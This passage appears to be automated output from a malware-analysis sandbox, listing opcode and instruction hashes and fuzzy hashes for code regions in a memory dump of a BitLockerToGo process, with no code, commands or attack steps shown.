                      • Instruction Fuzzy Hash: 4B02D331608340CFC718CF29C4C062ABBE5EF89708F48896DE9998B392DB75D855CB96
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0bca0735f4eca7cec3b2696249fc36fbc1a847b40b5cb522ae25a100bcdfc57d
                      • Instruction ID: ba670bc890a937dd727e1b54838255aecb1c23d9f2058328efdeb2f6bc001bee
                      • Opcode Fuzzy Hash: 0bca0735f4eca7cec3b2696249fc36fbc1a847b40b5cb522ae25a100bcdfc57d
                      • Instruction Fuzzy Hash: 4FD1B035A09241CFC709CF28D89066AB7F2FFC9308F198D6DE58687295CB31E965CB91
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e8f28c0247699e5e7324de752839ff151ed76e23a672ae865a275865e128a31a
                      • Instruction ID: bc4bf3784500a93ef0c27f3c380e42f98ef2a4b6607343f6a7dc63195e4c2c92
                      • Opcode Fuzzy Hash: e8f28c0247699e5e7324de752839ff151ed76e23a672ae865a275865e128a31a
                      • Instruction Fuzzy Hash: FEE190B59047418FC729CF28C490B63B7F2BF89304B48896DC9AA4B796DB35F809CB51
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc307bb0387d9e57702bd8fd74ee54be76f42e834f5ae26200db04391a8a0419
                      • Instruction ID: b6ecc32fedb995ef280dce6e9148d858dbd414315450a3710743bb432536fd75
                      • Opcode Fuzzy Hash: dc307bb0387d9e57702bd8fd74ee54be76f42e834f5ae26200db04391a8a0419
                      • Instruction Fuzzy Hash: A1C10775908391CFC7148F28D49176BBBE6AFDA305F0848ADE4C587381DB39D91ACB82
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d891712b9bd7ccfd4761c7c5b63d5a4abe1b789d1d0acbc8a1482cd112477eb4
                      • Instruction ID: 3f91f081549955f8ee02972cd36425b99690d226f63f02e1e4e78e8bb58ef2a7
                      • Opcode Fuzzy Hash: d891712b9bd7ccfd4761c7c5b63d5a4abe1b789d1d0acbc8a1482cd112477eb4
                      • Instruction Fuzzy Hash: 22919BB15183128BC715DF14C8A176BB3F2FF99364F05891CE8D69B290EB799944CB82
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12bb0be675b031f60f1351555034bb758592ff12006837e0d7052088d1b84e3e
                      • Instruction ID: 87fb4b0d133a95922c316e01fa4a497d9fccb98ffd919fbc569d71c26978c8ea
                      • Opcode Fuzzy Hash: 12bb0be675b031f60f1351555034bb758592ff12006837e0d7052088d1b84e3e
                      • Instruction Fuzzy Hash: 86A1713AA58202CFD708CF28D45172AB3E2FFC9315F2A89ACE545C7281DB35D966CB40
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a9e098be6554ce8a04b2dc5b354093f5b0ad1d2c891f321ea354d65fa28ef5a
                      • Instruction ID: 952b8f9ae7b298f8bcde4ff33b071d39dc80ffe407acb0b03ad1c4d6b187bd98
                      • Opcode Fuzzy Hash: 2a9e098be6554ce8a04b2dc5b354093f5b0ad1d2c891f321ea354d65fa28ef5a
                      • Instruction Fuzzy Hash: 4CA1E175A043128BC725DF18C89066AB7E2FF88724F19891DF985AB351DB35EC61CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0f9dd3ceb9af0f029a292b02a7c71a4909f2812524a9837c25a1c132c929c27
                      • Instruction ID: a2a6967c76860a04b8489c7a7d88347d64dfab1123cd4a7025450598b6e1db2f
                      • Opcode Fuzzy Hash: a0f9dd3ceb9af0f029a292b02a7c71a4909f2812524a9837c25a1c132c929c27
                      • Instruction Fuzzy Hash: F2817075A00B028FD324CF39D8D0A66B3F2FF99324B188A6DD556877A0EB35E855CB14
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9123a6f430cf50d4e899a9bedcc28f7b8e1ec5688161bb6317e840688e47d922
                      • Instruction ID: cf659314cb070989a823ac2de9de23afe349b880feb1d33de7a88464cfde387c
                      • Opcode Fuzzy Hash: 9123a6f430cf50d4e899a9bedcc28f7b8e1ec5688161bb6317e840688e47d922
                      • Instruction Fuzzy Hash: 31817C75500B128FCB24CF28C491767B3F1EF46354F048A5DD5A79BA90E778E846CB94
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 324b70fd4dc0b2237d5c29389f4f7dd9d3a54f358294f2ab9296338852c7647b
                      • Instruction ID: 6f70030c9eb2bc949f3fdd1ed4e83d12129e904bf72e5861f5ea61d187608993
                      • Opcode Fuzzy Hash: 324b70fd4dc0b2237d5c29389f4f7dd9d3a54f358294f2ab9296338852c7647b
                      • Instruction Fuzzy Hash: E6719938A1D241CBC709CF28D89066AB7F2FB89308F058D6DE4C687295CB35D965CB92
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4ea50eec80fc41d1c974fd29539b0285831c4ed90a69cf14e8ffa151c3fdcc7
                      • Instruction ID: 1aaefc2402fa4af9f1d4017e865cf12cb07ad126b555bd5743c0544b139f85b8
                      • Opcode Fuzzy Hash: f4ea50eec80fc41d1c974fd29539b0285831c4ed90a69cf14e8ffa151c3fdcc7
                      • Instruction Fuzzy Hash: 48819F7460D3928FC316CF29C4D062EBBE2AFC6214F18866EF4958B356DB35D806CB52
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 35cdb3b865d6d9ae7b46e6b19e6525c8f5ba74222836831f5a42572d4449d23a
                      • Instruction ID: 74ba9761139ff5ef5cd508d32864b3ac01746e905ce87ccbf3033d69acb40e68
                      • Opcode Fuzzy Hash: 35cdb3b865d6d9ae7b46e6b19e6525c8f5ba74222836831f5a42572d4449d23a
                      • Instruction Fuzzy Hash: 335146B9A00B008FD724DF65E981B26B3F6AF8A314F044828E99B87751EF35F815CB51
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ec6d6f56811edb0ed19fd759b697ffda81012dd30d00ea722c0c0a0423be0645
                      • Instruction ID: 50fb3d11ab0e0314d6fce7cc893adb0bf49a99e8670d40dda7b53613f7471850
                      • Opcode Fuzzy Hash: ec6d6f56811edb0ed19fd759b697ffda81012dd30d00ea722c0c0a0423be0645
                      • Instruction Fuzzy Hash: 8641A3327082554BCB188E2D9CE027EBAD39FC5309F0D857EE8C6CB386DA78D9149754
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 563fd4777850edf017621b2db6f7b14d09bf5ddf9b071c877ba08221cee6c806
                      • Instruction ID: b7d6d488628c754e54c12b88b227cc83b8ce9a71310a089edb11f74c1eafa0fe
                      • Opcode Fuzzy Hash: 563fd4777850edf017621b2db6f7b14d09bf5ddf9b071c877ba08221cee6c806
                      • Instruction Fuzzy Hash: DD51B172A083A08BE7158F6DC8D036FB7E2EBD5314F19482DE9858B341DB74D949CB92
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0472156888a9d07ee463277599612df771d5adf9853cb37a1831df0556469b40
                      • Instruction ID: 5aa54a7226c15bca33dcbf123e89039a31a0553a655ef65c038168c165afca09
                      • Opcode Fuzzy Hash: 0472156888a9d07ee463277599612df771d5adf9853cb37a1831df0556469b40
                      • Instruction Fuzzy Hash: 3951A976608301AFD315DF18CC90B2AB7E2EFC5724F14991DF588AB291DB35E825CB42
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 24bf08c800798a68078740fb666f942003a42ae8da8ae73368dabfff4d5b9e55
                      • Instruction ID: dde1239e35125137000371761ffc7c556fa874a711764b61cc662528b2780b73
                      • Opcode Fuzzy Hash: 24bf08c800798a68078740fb666f942003a42ae8da8ae73368dabfff4d5b9e55
                      • Instruction Fuzzy Hash: 7C4124B19083088BD7259F54D8C077AB7ECEF95B38F094669D9A9C7281EF71D804C752
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80a6bdb20465586c42fbdc23d61bf554e31a0d1f018767ce0abb60c89d8ccee5
                      • Instruction ID: 028d4b237e01ca5e74c00158fbaad698155feeb123a0ef1beaf4f071b855fde5
                      • Opcode Fuzzy Hash: 80a6bdb20465586c42fbdc23d61bf554e31a0d1f018767ce0abb60c89d8ccee5
                      • Instruction Fuzzy Hash: 3541B4BA82C691DFE3084F21D0A1366BBE0BB56305F0949BEC5CA43681C739D5A1CBD2
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59d34a19c63f7637f87f8dd427f7a9af08a022e6e4645efd9bbedc43a2bb1f0b
                      • Instruction ID: 8dd8a50da89effe8680dd232c14824430d0e1983c42da054aba5e809dd6f77f5
                      • Opcode Fuzzy Hash: 59d34a19c63f7637f87f8dd427f7a9af08a022e6e4645efd9bbedc43a2bb1f0b
                      • Instruction Fuzzy Hash: 71413A72B083904FE3188A3AD8E037ABBD39BC4310F49862EF1A9837D1DE758545D710
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 701ddb997d888cb486283e857c6a72f8b7978bba0664c9a4711aefc461ad29bb
                      • Instruction ID: 24aa9e689a37bf40c4951d45ba1b0fcdb7c30dfc530b5dcaed9db5e627243400
                      • Opcode Fuzzy Hash: 701ddb997d888cb486283e857c6a72f8b7978bba0664c9a4711aefc461ad29bb
                      • Instruction Fuzzy Hash: 7D411DB4A41B108FD328CF19C495723B7F2FB99315F844A5CD4868BA52DB34F85ACB98
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9c4e7cf42d9c1b082151a5429b4c226da23671380828fba53889f6a33ae6d802
                      • Instruction ID: 39c23e3575ce5c618c276c039dc889b5005152900d1c66491db03a4d82efe50c
                      • Opcode Fuzzy Hash: 9c4e7cf42d9c1b082151a5429b4c226da23671380828fba53889f6a33ae6d802
                      • Instruction Fuzzy Hash: EA411474A083419BD324DF08D99072BFBF6FB86B58F54881CE584CB251DB76D812DB86
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f6f4aaf8b639e1871eff442ba7f633a9ed6ab8a0f648f173ee1f4091836ccd1e
                      • Instruction ID: f0ddd8562b5381a1d00d82fc50041624bb7e092681548c0fe9fd5e9e287e82bd
                      • Opcode Fuzzy Hash: f6f4aaf8b639e1871eff442ba7f633a9ed6ab8a0f648f173ee1f4091836ccd1e
                      • Instruction Fuzzy Hash: D1314F70A057508FD329CF2AC495722B7F2FF59314B884A9DC4C68BA92D738E45ECB54
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c2ed731bd3d76f9c4039257334337b56274e7543240edde6a45ce640636c386f
                      • Instruction ID: 39095fec2f0a6f8cbda8717f31dcc7bd14ce797cef8d4683088ba20cc56c230e
                      • Opcode Fuzzy Hash: c2ed731bd3d76f9c4039257334337b56274e7543240edde6a45ce640636c386f
                      • Instruction Fuzzy Hash: 7A217A74E417119BD7388F19C8C6B23B7F2FB89308F98495CD0868B642DB35E459CB54
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 78076cb57f633a216ed37bdb2f0c5a767503d6c5e0ad86a502c7957bc1a9e4c4
                      • Instruction ID: 5113460e09d3346a5eb3fd3219e0adf6d8cd79a8fefaab9f00f3981d1c9f0da4
                      • Opcode Fuzzy Hash: 78076cb57f633a216ed37bdb2f0c5a767503d6c5e0ad86a502c7957bc1a9e4c4
                      • Instruction Fuzzy Hash: 7A318B75608305AFD711DF94C880A2BF7E2FBC5B18F04891DF8886B281DB30D905CB92
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 68df7baaaf10edeb6aacfac5415bb7d8a51baa0904ebc5e0ac7eb725a9e5e6c2
                      • Instruction ID: dd7029d25f2646a55389e59b0f8d5d5d18e32f68ca9d26a7f239371e574c2ba2
                      • Opcode Fuzzy Hash: 68df7baaaf10edeb6aacfac5415bb7d8a51baa0904ebc5e0ac7eb725a9e5e6c2
                      • Instruction Fuzzy Hash: AC01B5F164175147DB20AF18A5D0B37B2ADAF54F04F08552CDE044B241DF79EC0886A5
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 129ca96415bfc80373af7b5c821a53a4beba4d6694b064d205e5d6617f641cb0
                      • Instruction ID: 0b33467257d58b0b1641662ffb0d25fbf8e9e513d309c180c9c91cef4645ad4e
                      • Opcode Fuzzy Hash: 129ca96415bfc80373af7b5c821a53a4beba4d6694b064d205e5d6617f641cb0
                      • Instruction Fuzzy Hash: B6F0B43AB9921617A720CDEAECC0977F3E6EBC9654F094478E941D3341DD66E8068294
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                      • Instruction ID: 29a34a2bf8712c1438d37991ff113463f73700155395f242e8fb89e0ecaea710
                      • Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                      • Instruction Fuzzy Hash: 1DE0C266B496A10BA718CE3548E06B7B7E55A87326B1CA86DD892D3105C628C8155254
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                      • Instruction ID: 3992a34ddbe906825b5aa8a21e75f804096ad235b7d1f82b040338294415abb0
                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                      • Instruction Fuzzy Hash: 75D05B22508221579B758F199440577F7F4E9C7A11B45556EF681D314CD730D841C16D